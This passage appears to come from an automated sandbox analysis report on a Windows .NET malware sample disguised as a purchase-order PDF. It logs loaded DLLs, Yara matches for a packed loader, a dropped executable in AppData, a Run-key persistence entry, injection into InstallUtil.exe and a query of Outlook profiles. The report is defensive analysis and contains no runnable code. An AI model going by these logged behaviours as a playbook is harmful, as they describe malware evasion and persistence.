                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic file information: File size 1559040 > 1048576
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x17c000
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.6030000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1765937411.0000000006030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0118A892 push ecx; retf 0_2_0118A893
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_01184A0C push eax; retf 0_2_01184A0D
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_01189684 push eax; retf 0_2_01189685
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F131FB pushad ; iretd 0_2_05F133C9
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F131A0 pushad ; iretd 0_2_05F133C9
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10548 push esp; iretd 0_2_05F105AA
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10920 push ecx; iretd 0_2_05F1098A
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F1091B push ecx; iretd 0_2_05F1098A
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F104E0 push esp; iretd 0_2_05F105AA
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F104DB push esp; iretd 0_2_05F105AA
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10C43 push edx; iretd 0_2_05F10CA2
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10C48 push edx; iretd 0_2_05F10CA2
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F12BE0 push esi; iretd 0_2_05F12C3A
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F12BDB push esi; iretd 0_2_05F12C3A
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10358 push eax; iretd 0_2_05F10412
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10B13 push edx; iretd 0_2_05F10C42
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10B18 push edx; iretd 0_2_05F10C42
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10230 push eax; iretd 0_2_05F10412
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F1022B push eax; iretd 0_2_05F10412
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F10618 push ebp; iretd 0_2_05F10792
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F13200 pushad ; iretd 0_2_05F133C9
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F222C3 pushfd ; retf 0_2_05F222C9
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F22240 push esp; retf 0_2_05F22241
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F58391 pushad ; retf 0_2_05F58392
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F54381 pushad ; retf 0_2_05F54382
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FCF96 push es; retf 0_2_061FCFA8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FDDD8 pushad ; retf 0_2_061FDDE5
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FEDC2 push D6E803BDh; iretd 0_2_061FEDC7
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FC35C push es; iretd 0_2_061FC3F8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FB828 push eax; retf 0_2_061FB829
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_06218053 push es; ret 0_2_06218054
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeFile created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfoagcjtqviJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfoagcjtqviJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
